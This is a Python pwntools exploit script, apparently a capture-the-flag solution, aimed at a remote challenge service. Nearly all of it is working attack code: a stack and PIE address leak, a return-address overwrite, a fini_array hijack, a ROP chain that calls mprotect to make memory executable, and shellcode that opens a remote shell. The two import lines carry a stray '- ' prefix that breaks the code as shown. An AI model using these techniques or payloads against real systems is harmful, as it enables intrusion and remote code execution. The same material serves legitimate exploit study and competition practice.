- from pwn import *
- from heaputils import *
def write(addr, content):
    """Answer one round of the service's two-prompt write dialogue.

    Waits for ``"address : "`` and replies with the decimal form of *addr*
    NUL-padded to 0xF bytes, then waits for ``"data : "`` and replies with
    *content* packed by ``p64``.  Uses the module-global tube ``p``; the
    payload for each prompt is built only after that prompt has arrived,
    exactly as in the original step-by-step form.
    """
    rounds = (
        ("address : ", lambda: str(addr).ljust(0xF, "\x00")),
        ("data : ", lambda: p64(content)),
    )
    for prompt, build_payload in rounds:
        p.recvuntil(prompt)
        p.send(build_payload())
def exploit():
    """Drive the whole interaction against the module-global tube ``p``.

    Order of phases, as laid out in the body: leak a stack address via
    menu option 1, do a one-byte overwrite of a saved return address,
    leak a program address via menu option 2 and derive the PIE base,
    install gadget addresses through write(), then deliver a ROP chain and
    shellcode once control transfers.

    Every offset below is a constant tied to one specific build of
    ./attackme and to the author's debugger sessions: the pairs of raw
    0x7ff... addresses that are subtracted are run-specific values whose
    difference is the only thing that matters.  Nothing here is computed
    from the binary at runtime, so a different build will not work.

    NOTE(review): payloads are ``str`` objects (``"\\x00"`` padding,
    ``chr(0x4)``), i.e. written against Python 2 / an older pwntools;
    on Python 3 pwntools coerces str to bytes on send — confirm before
    relying on the exact byte values.
    """
    # --- phase 1: stack leak via menu option 1 ----------------------------
    # The service prints a hex value; the author treats it as a stack address.
    p.recvuntil(">")
    p.sendline("1")
    STACK = int(p.recvline(),16)
    # Delta 0x18 between the leaked value and a saved return address, as
    # observed in a debugger session (the two raw addresses only encode it).
    retaddr_location = 0x7fffd95e7108 - 0x7fffd95e70f0 + STACK
    log.info("STACK: 0x%x"%STACK)
    log.info("retaddr is at: 0x%x"%retaddr_location)
    # --- phase 2: partial overwrite -------------------------------------
    # Same prompt sequence as write(), but the data is a single byte (0x04),
    # so only the low byte of the return address is replaced.  Presumably
    # this lands in a nearby code path that prints the value read as
    # do_leak below — confirm against the binary.
    p.recvuntil("address : ")
    p.send(str(retaddr_location).ljust(0xF,"\x00"))
    p.recvuntil("data : ")
    p.send(chr(0x4))
    # --- phase 3: PIE leak via menu option 2 ------------------------------
    p.recvuntil(">")
    p.sendline("2")
    do_leak = int(p.recvline(),16)
    # The leaked address sits 0x8a15 past the image base in this build
    # (0x7fedc4b5ca15 - 0x7fedc4b54000).
    PIE = do_leak + 0x7fedc4b54000 - 0x7fedc4b5ca15
    log.info("PIE: 0x%x"%PIE)
    # Image-relative addresses for this build.  read/mprotect being at
    # fixed PIE offsets suggests a statically linked binary — confirm.
    call_rsi = PIE + 0x1c763
    pop_rdi = PIE + 0x84FA
    pop_rsi = PIE + 0xD9F2
    pop_rdx = PIE + 0x484C5
    read = PIE + 0x460F0
    mprotect = PIE + 0x47070
    do_overwrite = PIE + 0x89C3
    fini_list = PIE + 0x2ADFB0
    libc_csu_fini = PIE + 0x9810
    # 0x00000000000563d9 : add rsp, 0x148 ; ret
    pivot_gadget= PIE + 0x563d9
    # Full 8-byte overwrite of the same return-address slot as in phase 2,
    # this time pointing it at do_overwrite.
    p.recvuntil("address : ")
    p.send(str(retaddr_location).ljust(0xF,"\x00"))
    p.recvuntil("data : ")
    p.send(p64(do_overwrite))
    # Two entries of what the author names fini_list; by the names this is
    # presumably a termination-handler table that re-enters do_overwrite,
    # which is what makes the repeated write() calls below possible.
    # Inferred from identifiers only — confirm against the binary.
    write(fini_list+8,do_overwrite)
    write(fini_list,libc_csu_fini)
    # --- phase 4: stage a read() call on the stack, then pivot ------------
    # form a ROP chain: mprotect / shellcode
    # NOTE(review): ropstack is assigned but never used in this listing.
    ropstack = PIE + 0x2B4858
    # ropstack_stager = STACK - 0x38: the two raw addresses encode -0x180,
    # and the +0x148 matches the displacement of pivot_gadget above.
    ropstack_stager = STACK - 0x7ffc89d8d120 + 0x7ffc89d8cfa0 + 0x148
    # Rebound to STACK - 0x188, a different slot from the one used above
    # (presumably the return address of a different frame — confirm).
    retaddr_location = STACK - 0x7ffeaeb3c660 + 0x7ffeaeb3c4d8
    log.info("ROP Stack Stager: 0x%x"%ropstack_stager)
    # Stager chain, 8 bytes per slot: pop rdi=0 ; pop rsi=stager+0x38 ;
    # pop rdx=0x1000 ; read  -> read(0, stager+0x38, 0x1000), so the next
    # payload sent on the tube is placed right after this chain.
    write(ropstack_stager,pop_rdi)
    write(ropstack_stager+8,0)
    write(ropstack_stager+0x10,pop_rsi)
    write(ropstack_stager+0x18,ropstack_stager+0x38)
    write(ropstack_stager+0x20,pop_rdx)
    write(ropstack_stager+0x28,0x1000)
    write(ropstack_stager+0x30,read)
    # Point the rebound return-address slot at the add-rsp pivot.
    write(retaddr_location,pivot_gadget)
    # Main chain consumed by the staged read():
    #   mprotect(PIE, 0x1000, 7)   -- 7 = PROT_READ|PROT_WRITE|PROT_EXEC
    #   read(0, PIE, 0x1000)       -- receives the shellcode sent below
    #   jump to PIE
    ropchain = p64(pop_rdi)+p64(PIE)
    ropchain += p64(pop_rsi)+p64(0x1000)
    ropchain += p64(pop_rdx)+p64(7)
    ropchain += p64(mprotect)
    ropchain += p64(pop_rdi)+p64(0)
    ropchain += p64(pop_rsi)+p64(PIE)
    ropchain += p64(pop_rdx)+p64(0x1000)
    ropchain += p64(read)
    ropchain += p64(PIE)
    # Assembled for whatever context.arch is at call time (amd64 from main).
    shellcode_d = shellcraft.amd64.linux.sh()
    shellcode = asm(shellcode_d)
    p.send(ropchain)
    # Pause so the two sends are consumed by two separate read() calls
    # rather than being coalesced into one ("wait for pipe to end").
    sleep(1) #wait for pipe to end
    p.send(shellcode)
    p.interactive()
if __name__ == "__main__":
    # Target triple consulted by the pwntools helpers (asm, shellcraft, p64).
    context.os = 'linux'
    context.arch = 'amd64'
    # Local copy of the challenge binary.  ``e`` is not referenced by
    # exploit() or write() in this listing; presumably loaded for its
    # side effects on context or for interactive inspection — confirm.
    e = ELF("./attackme")
    # Module-global tube that write() and exploit() read from and send to;
    # the challenge endpoint is hard-coded here.
    p = remote("onewrite.teaser.insomnihack.ch", 1337)
    exploit()